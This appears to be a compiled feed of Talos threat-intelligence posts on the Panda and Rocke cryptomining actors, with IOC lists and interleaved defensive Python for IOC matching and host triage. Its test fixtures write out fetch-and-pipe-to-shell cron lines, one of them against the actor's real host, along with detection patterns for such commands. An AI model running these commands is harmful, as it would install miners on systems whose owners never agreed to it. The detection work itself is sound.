\n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
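The IOC list below is defanged with `[.]`, and the Gh0st RAT mutex values quoted above carry the C2 host and port in the mutex name itself. As an added example that is not part of the Talos post, the following refangs indicators, extracts host:port from the mutex strings, and checks constructed DNS query log lines against a subset of the post's own domains. It matches a query name only when it equals a listed domain or sits beneath one (so a look-alike such as bulehero.in.example.org does not hit, which plain substring matching would get wrong). The resolver log format, the sample queries, and the with_apexes() helper, which additionally blocks the two-label parent of each listed domain because Panda rotates subdomains under the same apex, are this example's assumptions.

```python
"""Refang the Panda indicators and check DNS query logs against them.
Added example, not Talos code; the indicators are the post's own, the DNS
log lines are constructed."""
import re


def refang(ioc):
    """Undo the usual defanging: hxxp -> http, [:] -> :, [.] -> ."""
    return ioc.strip().replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


# Subset of the post's domain IOCs, kept defanged exactly as published.
IOC_DOMAINS_DEFANGED = [
    "a46[.]bulehero[.]in", "bulehero[.]in", "fid[.]hognoob[.]se",
    "uio[.]hognoob[.]se", "wiu[.]fxxxxxxk[.]me", "mi[.]oops[.]best",
    "oo[.]mygoodluck[.]best", "rat[.]kingminer[.]club", "list[.]idc3389[.]top",
]
IOC_DOMAINS = {refang(d).lower() for d in IOC_DOMAINS_DEFANGED}

# Gh0st RAT mutex values in the post look like host:port[:tag].
MUTEX_RX = re.compile(r"^(?P<host>[A-Za-z0-9\[\].-]+):(?P<port>\d{1,5})(?::\S*)?$")


def parse_gh0st_mutex(mutex):
    """'oo[.]mygoodluck[.]best:51888:WervPoxySvc' -> ('oo.mygoodluck.best', 51888);
    None when the string is not in that shape (e.g. the default mutex name)."""
    m = MUTEX_RX.match(mutex.strip())
    if not m:
        return None
    return refang(m.group("host")).lower(), int(m.group("port"))


def with_apexes(iocs):
    """Add the two-label parent of each IOC so rotated subdomains still hit.
    Assumption: none of these sit under a two-label public suffix (co.uk
    style); for arbitrary lists use a public-suffix library instead."""
    out = set(iocs)
    for d in iocs:
        labels = d.split(".")
        if len(labels) > 2:
            out.add(".".join(labels[-2:]))
    return out


def matched_ioc(qname, iocs=IOC_DOMAINS):
    """IOC hit for a query name: exact, or a name beneath a listed domain.
    Longest IOC wins; substring matching is avoided on purpose."""
    q = qname.lower().rstrip(".")
    if q in iocs:
        return q
    for d in sorted(iocs, key=len, reverse=True):
        if q.endswith("." + d):
            return d
    return None


# Constructed resolver log: "<timestamp> <client> <qname> <qtype>"
SAMPLE_DNS_LOG = """\
2019-08-19T10:01:02Z 10.20.30.41 a46.bulehero.in A
2019-08-19T10:01:05Z 10.20.30.41 update.microsoft.com A
2019-08-19T10:02:11Z 10.20.30.42 cdn.hognoob.se A
2019-08-19T10:02:30Z 10.20.30.42 oo.mygoodluck.best A
2019-08-19T10:03:00Z 10.20.30.43 bulehero.in.example.org A
"""


def match_dns_log(text, iocs=IOC_DOMAINS):
    """(timestamp, client, qname, ioc) for each query that hits an IOC."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ioc = matched_ioc(parts[2], iocs)
        if ioc:
            hits.append((parts[0], parts[1], parts[2], ioc))
    return hits


if __name__ == "__main__":
    print(parse_gh0st_mutex("fxxk[.]noilwut0vv[.]club:9898"))
    for hit in match_dns_log(SAMPLE_DNS_LOG, with_apexes(IOC_DOMAINS)):
        print(*hit)
```

With the exact list, the constructed cdn.hognoob.se query is missed because only specific hognoob[.]se subdomains are published; with_apexes() catches it at the cost of the public-suffix assumption stated in its docstring, which is the trade-off to make explicitly before loading a list like this into a resolver blocklist.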
\n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.]life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n195[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 
\na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T19:09:28", "description": "_This post was authored by [David Liebenberg](<https://twitter.com/chinahanddave>). _\n\n \n \n\n\n## Summary\n\n \nCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. \n \nIn this post, we look at the activity of one particular threat actor: Rocke. 
We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors. \n \n\n\n## Introduction\n\n \nTalos has written widely about the issue of [cryptomining malware](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) and how organizations should [protect systems](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) against this threat. We continue to track developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor we refer to as \"Rocke\" came to our attention. \n \nRocke actively engages in distributing and executing cryptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. \n \n\n\n## Early campaigns\n\n \nThis threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. \n \nSeveral files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999.\" Subsequently, the Gitee user page transitioned to \"c-888.\" Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18.\" \n \nThe repositories on both Gitee and GitLab were identical. All the repositories had a folder called \"ss\" that contained 16 files. 
The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. \n \nOnce the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space.\" Despite the image extension, this file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java.\" The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines whether \"h32\" or \"h64\" is used to invoke \"java.\" \n \nAlthough we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to be the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform. \n \n\n\n## Recent campaign\n\n \nIn late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor. \n \nWe observed a wget request from our Struts2 honeypot for a file named \"0720.bin\" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting \"0720.bin\" along with 10 additional files: \"3307.bin,\" \"a7,\" \"bashf,\" \"bashg,\" \"config.json,\" \"lowerv2.sh,\" \"pools.txt,\" \"r88.sh,\" \"rootv2.sh\" and \"TermsHost.exe.\" We set about examining these files. \n \n \n[](<https://3.bp.blogspot.com/-Wv1QkpgsIM0/W4gFUMGqKFI/AAAAAAAAAx4/evI36ADu_wE3nWnR38WNm6I2gitFSIngwCLcBGAs/s1600/image5.png>) \n--- \nScreenshot of HFS system \n \n \n \n \nWe had previously observed this same IP scanning for TCP port 7001 throughout May 2018. 
This was potentially a scan for Oracle WebLogic servers, which listen on TCP port 7001 by default. \n \nBoth \"0720.bin\" and \"3307.bin\" are ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morphus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that [Morphus Labs](<https://morphuslabs.com/criminals-dont-read-instructions-or-use-strong-passwords-a09439617867>) described, the hard-coded password was not only identical, but also located at the same offset. \n \n[](<https://3.bp.blogspot.com/-gkkEgex3fQE/W4gFfUPyS7I/AAAAAAAAAx8/FIip4n1BydgCUlwQQoEJKmNlfvJ3ShivQCLcBGAs/s1600/image3.png>) \n--- \nHard-coded password \n \n \n \n\"A7\" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as \"cranberry,\" \"yam,\" or \"kworker\"), as well as mining in general (such as \"minerd\" and \"cryptonight\"). It detects and uninstalls various Chinese AV products, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called [\"libprocesshider,\"](<https://github.com/gianlucaborello/libprocesshider>) which hides the \"x7\" process from process listings via LD_PRELOAD (its documented install method is an entry in /etc/ld.so.preload, so every dynamically linked process loads it). The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading \"a7\" again from the actor's HFS at 118[.]24[.]150[.]172 and executing it. 
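The cron job that fetches logo.jpg, the libprocesshider preload and the known_hosts harvesting described above are all visible on the host itself. As an added example, not code from Talos and not from the Rocke scripts, the following triages those three artifacts on a Linux box from constructed copies of a crontab, /etc/ld.so.preload and ~/.ssh/known_hosts. The malicious cron line is modelled on the logo.jpg fetch (the page does not show the exact form of Rocke's cron entry), and all three file contents, the rule wording and the severity notes are this example's assumptions.

```python
"""Triage a Linux host for the Rocke persistence and hiding techniques
described above.  Added example, not Talos or Rocke code; the three file
contents below are constructed."""
import re

# Constructed user crontab: one fetch-and-pipe-to-sh entry modelled on the
# logo.jpg download, plus two ordinary jobs that must not be flagged.
CRONTAB_TEXT = """\
SHELL=/bin/sh
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://3389.space/logo.jpg || wget -q -O - http://3389.space/logo.jpg) | sh
@reboot /usr/local/bin/node-exporter
"""
# Constructed /etc/ld.so.preload.  A clean server normally has no such file;
# libprocesshider is installed by listing it here, so every process loads it.
LD_SO_PRELOAD_TEXT = "/usr/local/lib/libprocesshider.so\n"
# Constructed ~/.ssh/known_hosts: plain, hashed and [host]:port forms.
KNOWN_HOSTS_TEXT = """\
10.0.5.12,db01 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyData
|1|c2FsdA==|aGFzaA== ssh-rsa AAAAB3NzaC1yc2EAAAADAQABExampleKeyData
[10.0.5.13]:2222 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYExample
"""

CRON_SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){5})")
FETCH_RX = re.compile(r"\b(curl|wget)\b[^|;&]*https?://", re.I)
PIPE_TO_SHELL_RX = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")
TMP_EXEC_RX = re.compile(r"(^|[\s;&|(])(/tmp|/dev/shm|/var/tmp)/\S+")
IMAGE_URL_RX = re.compile(r"https?://\S+\.(jpe?g|png|gif)\b", re.I)


def suspicious_cron_entries(text):
    """[(schedule, command, reasons)] for cron lines that pipe remote content
    into a shell, run from world-writable dirs, or fetch an image-named URL
    (Rocke's logo.jpg is really a shell script)."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                      # blank, comment or VAR=value
        m = CRON_SCHEDULE.match(line)
        if not m:
            continue
        schedule, command = m.group(0).strip(), line[m.end():].strip()
        reasons = []
        if FETCH_RX.search(command) and PIPE_TO_SHELL_RX.search(command):
            reasons.append("remote content piped to a shell")
        if TMP_EXEC_RX.search(command):
            reasons.append("runs from a world-writable directory")
        if IMAGE_URL_RX.search(command):
            reasons.append("fetches an image-named URL from cron")
        if reasons:
            findings.append((schedule, command, reasons))
    return findings


def preload_entries(text):
    """Each non-empty /etc/ld.so.preload line is injected into every
    dynamically linked process; report every one with a note."""
    out = []
    for line in text.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        if "processhider" in path.lower():
            note = "known process-hiding library name"
        elif path.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")):
            note = "loaded from a world-writable directory"
        else:
            note = "review: preload libraries are rare on servers"
        out.append((path, note))
    return out


def known_hosts_targets(text):
    """(hosts an attacker script can harvest, count of hashed entries it
    cannot read back).  'ssh-keygen -H' produces the hashed |1|salt|hash form."""
    targets, hashed = [], 0
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0].startswith("@"):      # @cert-authority / @revoked marker
            parts = parts[1:]
        if parts[0].startswith("|1|"):
            hashed += 1
            continue
        for h in parts[0].split(","):
            m = re.match(r"^\[(.+)\]:\d+$", h)   # [host]:port form
            targets.append(m.group(1) if m else h)
    return targets, hashed


def triage(crontab=CRONTAB_TEXT, preload=LD_SO_PRELOAD_TEXT, known_hosts=KNOWN_HOSTS_TEXT):
    """Run all three checks and return one report."""
    return {"cron": suspicious_cron_entries(crontab),
            "ld_so_preload": preload_entries(preload),
            "ssh_targets": known_hosts_targets(known_hosts)}
```

On a real host the inputs would come from `crontab -l` for every user plus /etc/cron.d, from /etc/ld.so.preload, and from each user's known_hosts; the hashed-entry count matters because a known_hosts kept in hashed form denies a script like a7 its list of SSH targets, which is the cheap mitigation this section points at.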

[Extract of Source Code of "a7"](<https://3.bp.blogspot.com/-kHdZB-4kmko/W4gF3DsxTGI/AAAAAAAAAyE/hYEz3KrdFgIkb7EvjWOa_-K-iwZvnGmzACLcBGAs/s1600/image4.png>)

"Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor "Rocke" (note that for MinerGate, an email can be used in place of a Monero wallet number — it's simply the login email for the MinerGate platform). "Pools.txt" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first.

"Bashf" is a variant of XMR-stak while "bashg" is a variant of XMRig.

"Lowerv2.sh" and "rootv2.sh" are similar shell scripts that attempt to download and execute the mining malware components "bashf" and "bashg," hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk.

"R88.sh" is a shell script that installs a cron job and attempts to download "lowerv2.sh" or "rootv2.sh."

"TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the [Monero Silent Miner](<https://xmrminer.net/faq.php>). This miner can be purchased online for $14 and is marketed to malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls." The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn.
The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system.

The payload appears to be similar to one used by the Iron Cybercrime Group, as [reported](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>) by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and the Iron Cybercrime Group.

## The actor

Through Rocke's MinerGate Monero wallet email [rocke@live.cn](<mailto:rocke@live.cn>), we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a [leak](<http://www.moonsec.com/post-467.html>) of user information from the Chinese security site FreeBuf that showed that a user named "rocke" was associated with the email [jxci@vip.qq.com](<mailto:jxci@vip.qq.com>). This suggested that they were one and the same. [4]

Rocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language.

The majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the "jx" in jxci@vip.qq.com stands for Jiangxi.
Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.

### The GitHub

We identified a [GitHub page](<https://github.com/rocke>) apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one [repository folder](<https://github.com/rocke/rocke.github.io/tree/master/sample>), we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner.

[Image](<https://2.bp.blogspot.com/-SNtJa5UiPK4/W4gGCqRKeUI/AAAAAAAAAyI/5Q6jWCI6uS45BK8w0iehPGTNISfSnZIMQCLcBGAs/s1600/image2.png>)

We found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May.

We also found an [additional repository](<https://github.com/gosrs>) through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it.

The files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads.

[Image](<https://3.bp.blogspot.com/-RfGQEzxzT8U/W4gGOJCNnWI/AAAAAAAAAyQ/9LUooe3vkT4oisVEs5G9zakzcxEqLdirQCLcBGAs/s1600/image6.png>)

[Image](<https://4.bp.blogspot.com/--PZgS5QMD4c/W4gGVIWDJxI/AAAAAAAAAyY/5HcEvufCv5UrUxV5E-F9btlI7knaiWH1QCLcBGAs/s1600/image1.png>)

One of the JavaScript files in the repository, named "command.js," uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file "dDNLQrsBUE.url" dropped by "TermsHost.exe."

Rocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers.

## Conclusion

Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit miners onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.

Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.
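
The Linux-side artifacts described in this post (cron-based download-and-execute persistence, process hiding through libprocesshider in /etc/ld.so.preload, and XMRig-style config files whose "user" is a MinerGate email rather than a wallet) can be checked for on a host with the following added example. It is not code from the post or from the actor's scripts; the crontab, ld.so.preload and config.json inputs are constructed, with placeholder hosts and accounts in place of the real indicators.

```python
"""Host triage for the Linux artifacts described above: cron jobs that fetch
and run remote content, libraries forced into every process through
/etc/ld.so.preload (how libprocesshider hides a process), and XMRig-style
pool configs whose "user" is an email login rather than a wallet.
Added example; not code from the post or from the actor's scripts."""
import json
import re

# A fetch tool (curl/wget) whose output is piped to a shell, or followed by
# execution of what it fetched, is the download-and-execute shape used for
# cron persistence in the campaign.
_FETCH = r"(?:curl|wget)\b[^|;&]*"
_CRON_PATTERNS = [
    re.compile(_FETCH + r"\|\s*(?:ba)?sh\b"),                   # curl ... | sh
    re.compile(_FETCH + r"(?:;|&&)\s*(?:ba)?sh\s+\S+"),          # wget ...; sh file
    re.compile(_FETCH + r"(?:;|&&)\s*(?:chmod\s+\+?x\b|\./)"),   # wget ...; chmod +x ...
]


def suspicious_cron_entries(crontab_text):
    """Return crontab lines that download something and execute it."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and any(p.search(line) for p in _CRON_PATTERNS):
            hits.append(line)
    return hits


def preload_hijacks(ld_preload_text, trusted=()):
    """Return libraries in /etc/ld.so.preload that are not on the trusted list.
    Anything listed here is loaded into every dynamically linked process,
    which is how libprocesshider filters a process out of /proc listings."""
    libs = (l.strip() for l in ld_preload_text.splitlines())
    return [lib for lib in libs if lib and not lib.startswith("#") and lib not in trusted]


_EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def miner_pool_indicators(config_text):
    """Extract pool/user pairs from an XMRig-style config.json ("pools" list).
    An email in the user field is a MinerGate-style account login, which is
    the detail that let the post name the actor."""
    cfg = json.loads(config_text)
    found = []
    for pool in cfg.get("pools", []):
        user = pool.get("user", "")
        found.append({"pool": pool.get("url", ""), "user": user,
                      "email_login": bool(_EMAIL.match(user))})
    return found


# Constructed samples; placeholder hosts and accounts stand in for the real ones.
SAMPLE_CRONTAB = """\
# constructed crontab
*/10 * * * * (curl -fsSL http://example.invalid/logo.jpg || wget -q -O - http://example.invalid/logo.jpg) | sh
0 3 * * * /usr/bin/apt-get update -qq
*/15 * * * * wget -q http://example.invalid/java -O /tmp/java; chmod +x /tmp/java; /tmp/java
"""
SAMPLE_LD_PRELOAD = "/usr/local/lib/libprocesshider.so\n"
SAMPLE_CONFIG = json.dumps({"pools": [
    {"url": "xmr.pool.example.invalid:45700", "user": "operator@example.invalid", "pass": "x"},
    {"url": "pool.example.invalid:3333", "user": "4" + "A" * 94, "pass": "x"},
]})

if __name__ == "__main__":
    print("cron:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("ld.so.preload:", preload_hijacks(SAMPLE_LD_PRELOAD))
    print("pools:", miner_pool_indicators(SAMPLE_CONFIG))
```

On a live host the inputs would be the output of `crontab -l` for each user plus /etc/cron.d, the contents of /etc/ld.so.preload, and any config.json or pools.txt found next to an unknown binary.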

## IOCs:

_Source: [Rocke: The Champion of Monero Miners](<http://feedproxy.google.com/~r/feedburner/Talos/~3/e2oaIaRaI6k/rocke-champion-of-monero-miners.html>), Talos blog, published 2018-08-30, modified 2018-08-31. CVEs referenced: CVE-2017-10271, CVE-2017-3066._

## The Dark Side of the Digital Gold Rush

_This post was authored by [Nick Biasini](<https://twitter.com/infosec_nick>), [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Josh Reynolds](<https://www.twitter.com/JershMagersh>) with contributions from [Azim Khodijbaev](<https://twitter.com/ashukuhi>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._

[Image](<https://1.bp.blogspot.com/-arFNhXlv5Mw/WnHgQ5o5WDI/AAAAAAAABpc/R8cgpTc4WnsyovMYujbV815KaTNd1mQgwCLcBGAs/s1600/pan-gold_transp.png>)

## Executive Summary

The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining-related attacks have emerged as a primary interest for many attackers, who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks.

This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockchain" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom.
Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day-to-day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high, which may make them attractive to cyber criminals moving forward.

